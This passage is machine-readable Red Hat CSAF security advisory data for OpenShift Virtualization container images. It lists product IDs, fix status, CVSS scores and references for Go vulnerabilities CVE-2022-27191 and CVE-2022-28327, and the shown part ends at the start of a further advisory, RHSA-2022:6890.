"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-27191" }, { "category": "external", "summary": "RHBZ#2064702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064702" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-27191", "url": "https://www.cve.org/CVERecord?id=CVE-2022-27191" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", "url": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ" } ], "release_date": "2022-03-15T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: crash in a golang.org/x/crypto/ssh server" }, { "cve": "CVE-2022-28327", "cwe": { "id": "CWE-190", "name": "Integer Overflow or Wraparound" }, "discovery_date": "2022-04-21T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2077689" } ], "notes": [ { "category": "description", "text": "An integer overflow flaw was found in Golang\u0027s crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: crypto/elliptic: panic caused by oversized scalar", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang \u0026 go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-28327" }, { "category": "external", "summary": "RHBZ#2077689", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077689" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-28327", "url": "https://www.cve.org/CVERecord?id=CVE-2022-28327" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-28327", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28327" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", "url": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8" } ], "release_date": "2022-04-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: crypto/elliptic: panic caused by oversized scalar" } ] }
rhsa-2022_6890
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "This advisory contains the following OpenShift Virtualization 4.8.7 images:\n\nRHEL-8-CNV-4.8\n\n==============\n\nvm-import-controller-container-v4.8.7-4\novs-cni-marker-container-v4.8.7-6\nvirt-cdi-apiserver-container-v4.8.7-4\nvirt-cdi-uploadserver-container-v4.8.7-4\nvirt-cdi-uploadproxy-container-v4.8.7-4\nvm-import-virtv2v-container-v4.8.7-4\nhostpath-provisioner-container-v4.8.7-4\novs-cni-plugin-container-v4.8.7-5\nbridge-marker-container-v4.8.7-5\nvirt-cdi-controller-container-v4.8.7-4\nnode-maintenance-operator-container-v4.8.7-4\ncluster-network-addons-operator-container-v4.8.7-5\ncnv-containernetworking-plugins-container-v4.8.7-5\nvirt-cdi-importer-container-v4.8.7-4\nvm-import-operator-container-v4.8.7-4\nkubemacpool-container-v4.8.7-5\nkubevirt-vmware-container-v4.8.7-4\nkubevirt-v2v-conversion-container-v4.8.7-4\nkubernetes-nmstate-handler-container-v4.8.7-5\nvirtio-win-container-v4.8.7-4\nkubevirt-ssp-operator-container-v4.8.7-3\nvirt-cdi-operator-container-v4.8.7-4\ncnv-must-gather-container-v4.8.7-4\nhyperconverged-cluster-operator-container-v4.8.7-4\nvirt-cdi-cloner-container-v4.8.7-4\nhostpath-provisioner-operator-container-v4.8.7-4\nhyperconverged-cluster-webhook-container-v4.8.7-4\nkubevirt-template-validator-container-v4.8.7-4\nvirt-handler-container-v4.8.7-5\nvirt-api-container-v4.8.7-5\nvirt-operator-container-v4.8.7-5\nvirt-launcher-container-v4.8.7-5\nvirt-controller-container-v4.8.7-5\nhco-bundle-registry-container-v4.8.7-28\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:6890", "url": "https://access.redhat.com/errata/RHSA-2022:6890" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6890.json" } ], "title": "Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update", "tracking": { "current_release_date": "2024-11-22T18:27:58+00:00", "generator": { "date": "2024-11-22T18:27:58+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2022:6890", "initial_release_date": "2022-10-11T16:02:33+00:00", "revision_history": [ { "date": "2022-10-11T16:02:33+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-10-11T16:02:33+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-22T18:27:58+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "CNV 4.8 for RHEL 8", "product": { "name": "CNV 4.8 for RHEL 8", "product_id": "8Base-CNV-4.8", "product_identification_helper": { "cpe": "cpe:/a:redhat:container_native_virtualization:4.8::el8" } } } ], "category": "product_family", "name": "OpenShift Virtualization" }, { "branches": [ { "category": "product_version", "name": 